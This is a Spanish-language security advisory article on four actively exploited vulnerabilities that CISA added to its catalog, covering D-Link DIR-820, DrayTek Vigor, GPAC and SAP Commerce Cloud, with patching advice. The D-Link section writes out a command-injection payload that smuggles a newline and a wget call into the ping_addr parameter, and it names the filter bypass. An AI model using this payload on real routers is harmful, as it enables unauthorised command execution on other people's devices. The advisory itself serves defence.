Descripción general La Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) ha agregado recientemente cuatro nuevas vulnerabilidades a su Catálogo de vulnerabilidades explotadas conocidas, lo que indica una explotación activa en curso. Estas vulnerabilidades presentan riesgos importantes para las organizaciones que dependen de las tecnologías afectadas. La actualización de CISA destaca varias vulnerabilidades críticas. El primero, CVE-2023-25280, pertenece a una vulnerabilidad de inyección de comandos del sistema operativo encontrada en el enrutador D-Link DIR-820. A continuación, CVE-2020-15415 afecta a varios enrutadores DrayTek Vigor y también implica una inyección de comando del sistema operativo. Otra vulnerabilidad importante, CVE-2021-4043, está relacionada con una desreferencia de puntero nulo en Motion Spell GPAC. Por último, CVE-2019-0344 implica una deserialización de una vulnerabilidad de datos no confiables en SAP Commerce Cloud. Detalles técnicos de las vulnerabilidades CVE-2023-25280: enrutador D-Link DIR-820 Publicado el 16 de marzo de 2023, se identificó una vulnerabilidad crítica de inyección de comandos del sistema operativo en el enrutador D-Link DIR-820LA1_FW105B03, lo que permite a los atacantes escalar privilegios a raíz. Esta vulnerabilidad se explota mediante una carga útil diseñada que apunta al parámetro ping_addr, lo que representa un riesgo grave para los dispositivos conectados a Internet. Específicamente, la vulnerabilidad de inyección de comandos reside en la función pingV4Msg del componente «/ping.ccp», lo que permite a un atacante elevar los privilegios a root. La versión afectada es DIR820LA1_FW105B03 y los detalles sobre la vulnerabilidad indican que se encuentra en el directorio de archivos /sbin/ncc2. La función vulnerable sub_49EDF8 recupera el contenido de la variable ping_addr de las solicitudes a /ping.ccp, lo que permite la ejecución de comandos del sistema. Cuando el parámetro ccp_act se establece en pingV4Msg, la función ccp_ping hace referencia a esta función vulnerable, creando una vía para la ejecución del comando. A pesar de los esfuerzos por filtrar entradas potencialmente dañinas, la función no filtra adecuadamente símbolos como %0a y $, lo que permite a los atacantes eludir las defensas. Para reproducir la vulnerabilidad, se pueden seguir pasos específicos utilizando el firmware de simulación FirmAE. Por ejemplo, un atacante podría iniciar un servidor web local y utilizar un vector de ataque diseñado como “ccp_act=pingV4Msg&ping_addr=%0awget http://192.168.0.2” para ejecutar el ataque. CVE-2020-15415: enrutadores DrayTek Vigor Esta vulnerabilidad afecta a los dispositivos DrayTek Vigor3900, Vigor2960 y Vigor300B que ejecutan versiones anteriores a la 1.5.1. Permite la ejecución remota de comandos a través de metacaracteres de shell en un nombre de archivo, particularmente cuando se utiliza el tipo de contenido text/x-python-script, lo que plantea riesgos para los usuarios de estos enrutadores. El aviso de seguridad sobre este problema está identificado por CVE-2020-14472 y CVE-2020-15415, los cuales están clasificados como críticos. DrayTek ha reconocido la explotación potencial relacionada con la WebUI de los modelos Vigor 2960, 3900 y 300B. El 17 de junio de 2020, la empresa lanzó una versión de firmware actualizada para abordar esta vulnerabilidad. Se insta a los usuarios afectados a actualizar su firmware a la versión 1.5.1.1 o posterior lo antes posible. Mientras tanto, si la actualización inmediata no es factible, los usuarios deben desactivar el acceso remoto a sus dispositivos o implementar una lista de control de acceso (ACL) para el acceso remoto hasta que puedan realizar la actualización. Las descargas de firmware están disponibles específicamente para las regiones del Reino Unido e Irlanda. Se recomienda a los usuarios que tienen el acceso remoto habilitado en sus enrutadores que lo deshabiliten si no es necesario y, si se debe mantener el acceso remoto, se debe restringir mediante una ACL, que permite que solo una lista predefinida de direcciones IP permitidas acceda al enrutador de forma remota. . Alternativamente, los usuarios pueden permitir la administración remota exclusivamente a través de una VPN segura o utilizar VigorACS para la administración central. CVE-2021-4043: Motion Spell GPAC Identificada el 4 de febrero de 2022, una vulnerabilidad de desreferencia de puntero nulo en la biblioteca GPAC afecta a las versiones anteriores a la 1.1.0 y está clasificada como un riesgo de gravedad media con una puntuación CVSS de 5,8. Esta vulnerabilidad se clasifica en CWE-476, que aborda específicamente problemas relacionados con la desreferenciación de puntero nulo, donde el producto intenta acceder a un puntero que se espera que sea válido pero que, de hecho, es nulo. Las consecuencias comunes de tales vulnerabilidades incluyen la denegación de servicio (DoS), ya que las desreferencias de punteros NULL a menudo conducen a fallas en el proceso a menos que se implemente el manejo de excepciones. Incluso con un manejo excepcional, restaurar el software a un estado operativo seguro puede resultar todo un desafío. En casos excepcionales, si NULL corresponde a la dirección de memoria 0x0 y el código privilegiado puede acceder a ella, puede permitir la ejecución de código no autorizado o la manipulación de la memoria. Para mitigar los riesgos asociados con las vulnerabilidades de desreferencia de puntero nulo, es fundamental verificar todos los punteros que podrían haberse modificado para NULL antes de su uso. También puede resultar beneficioso seleccionar lenguajes de programación que reduzcan inherentemente la susceptibilidad a estos problemas. Además, los desarrolladores deben verificar los resultados de todas las funciones que devuelven valores para asegurarse de que no sean nulos antes de su uso. Si bien verificar los valores de retorno puede ser efectivo, es esencial permanecer atento a las condiciones de carrera en entornos concurrentes. CVE-2019-0344: SAP Commerce Cloud Publicado el 14 de agosto de 2019, una vulnerabilidad en SAP Commerce Cloud surge de una deserialización insegura, lo que afecta múltiples versiones y potencialmente permite la ejecución de código arbitrario con derechos de usuario ‘Hybris’. Esta vulnerabilidad, identificada como CVE-2019-0344, afecta específicamente a las versiones 6.4, 6.5, 6.6, 6.7, 1808, 1811 y 1905 de la extensión virtualjdbc, permitiendo ataques de inyección de código. CVE-2019-0344 se caracteriza por su capacidad de permitir a los atacantes ejecutar código arbitrario en un sistema de destino debido a una deserialización insegura dentro de la extensión virtualjdbc de SAP Commerce Cloud. La explotación de esta vulnerabilidad puede resultar en la ejecución de código arbitrario en las máquinas afectadas, aprovechando los privilegios asociados con el usuario ‘Hybris’. Los detalles técnicos de la vulnerabilidad revelan que el proceso de deserialización inseguro introduce un riesgo crítico para la inyección de código. Para mitigar y prevenir una posible explotación, son necesarias acciones inmediatas. Se recomienda a los usuarios que apliquen rápidamente los parches de seguridad proporcionados por SAP, supervisen la ejecución de código no autorizado o el comportamiento inusual del sistema y restrinjan el acceso a los sistemas vulnerables. Para la seguridad a largo plazo, es esencial actualizar y parchear periódicamente SAP Commerce Cloud para abordar las vulnerabilidades conocidas e implementar prácticas de codificación segura para evitar futuros ataques de inyección de código. Garantizar que todos los sistemas que ejecutan la extensión virtualjdbc estén actualizados con los últimos parches de seguridad es crucial para mantener la integridad y seguridad de la plataforma. Conclusión Las vulnerabilidades enumeradas por CISA presentan importantes riesgos de seguridad, particularmente para las organizaciones que utilizan los productos afectados. Las organizaciones deben permanecer alerta, abordar rápidamente estas vulnerabilidades y aplicar los parches o actualizaciones necesarios. Al priorizar la ciberseguridad y abordar estas vulnerabilidades de manera proactiva, las organizaciones pueden mejorar su postura de seguridad y reducir el riesgo de explotación. Recomendaciones y mitigaciones Las organizaciones deben evaluar sus sistemas para detectar estas vulnerabilidades e implementar los últimos parches de seguridad. Supervise periódicamente los sistemas para detectar cualquier signo de explotación relacionado con estas vulnerabilidades. Asegúrese de que el personal de TI conozca estas vulnerabilidades y los pasos necesarios para mitigarlas. Actualice las políticas de seguridad y los planes de respuesta a incidentes para tener en cuenta posibles exploits vinculados a estas vulnerabilidades. Relacionado